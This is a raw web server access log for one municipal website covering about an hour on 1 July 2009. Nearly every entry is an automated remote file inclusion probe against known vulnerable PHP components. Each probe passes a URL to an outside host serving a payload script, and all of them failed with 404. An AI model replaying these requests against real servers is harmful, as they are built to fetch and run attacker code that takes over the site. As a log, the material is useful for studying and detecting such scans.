219.85.63.226 - - [01/Jul/2009:00:12:31 -0700] "GET /logs/access_080531.log//include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:00:16:48 -0700] "GET /logs/access.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:19:54 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:19:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:19:54 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:23:20 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:23:20 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:23:20 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:23:41 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:27:40 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:27:42 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:27:43 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:13 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:13 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:28:19 -0700] "GET /logs/access_081001.log%20%20///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:28:19 -0700] "GET /logs///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:28:19 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:23 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:23 -0700] "GET /logs/access_080531.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:27 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:28:27 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:29:02 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:29:07 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:29:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:29:10 -0700] "GET /logs/access_080531.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:29:34 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:31:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:31:50 -0700] "GET /logs///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:31:50 -0700] "GET /logs/access_081001.log%20%20///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:32:05 -0700] "GET /logs/access_080601.log%20%20///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:34:50 -0700] "GET /logs///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:34:50 -0700] "GET //contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:34:50 -0700] "GET /logs/access_081001.log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:00:36:05 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:00:36:05 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:00:36:05 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:00:36:32 -0700] "GET /logs/access_080330.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:36:45 -0700] "GET /logs/access_080601.log%20%20///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.80.195.37 - - [01/Jul/2009:00:36:59 -0700] "GET / HTTP/1.0" 200 901 "-" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; acc=jocker; (R1 1.5); .NET CLR 1.1.4322)" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:37:16 -0700] "GET /logs/access_081001.log%20%20///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:37:16 -0700] "GET /logs///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:37:18 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:37:59 -0700] "GET //contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:37:59 -0700] "GET /logs/access_081001.log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:37:59 -0700] "GET /logs///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:38:36 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:38:36 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:00:38:38 -0700] "GET /logs/access_080601.log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:39:05 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:39:23 -0700] "GET /logs/access_080601.log%20%20///index.php?DOCUMENT_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:00:40:19 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:00:40:23 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:00:40:23 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:00:42:04 -0700] "GET /logs/access_080330.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [01/Jul/2009:00:42:36 -0700] "GET /logs/access_080601.log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:43:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:43:33 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.72.208.90 - - [01/Jul/2009:00:43:58 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.castandcatch.com/forum/phpBB3/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.72.208.90 - - [01/Jul/2009:00:43:59 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.castandcatch.com/forum/phpBB3/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.72.208.90 - - [01/Jul/2009:00:43:59 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.castandcatch.com/forum/phpBB3/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.242.165.138 - - [01/Jul/2009:00:44:46 -0700] "GET /logs/access.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:45:14 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:45:14 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:45:42 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:45:47 -0700] "GET //contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:45:47 -0700] "GET /logs///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:45:51 -0700] "GET /logs/access_081001.log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:47:00 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [01/Jul/2009:00:48:08 -0700] "GET /logs/access_080601.log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:49:00 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:54:05 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:54:05 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:54:10 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:55:02 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:55:02 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:55:29 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:56:12 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.38.187.136 - - [01/Jul/2009:00:56:59 -0700] "GET /config.php?inc_dir=http://www.1-zigzag.ru/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:57:15 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:00:57:42 -0700] "GET /config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.38.136.16 - - [01/Jul/2009:00:57:42 -0700] "GET /config.php?inc_dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:00:58:16 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:59:12 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:59:12 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:59:12 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:59:44 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:59:44 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:00:59:44 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:00:59:52 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:00:59:52 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:00:59:52 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:01:33 -0700] "GET /logs/access_081001.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:01:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:01:33 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.23.158.226 - - [01/Jul/2009:01:02:12 -0700] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.23.158.226 - - [01/Jul/2009:01:02:12 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.23.158.226 - - [01/Jul/2009:01:02:12 -0700] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.23.158.226 - - [01/Jul/2009:01:02:12 -0700] "GET /logs/access_080531.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.23.158.226 - - [01/Jul/2009:01:02:12 -0700] "GET /logs/access_080531.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
65.23.158.226 - - [01/Jul/2009:01:02:12 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:01:03:12 -0700] "GET /logs/access_080601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:01:03:29 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
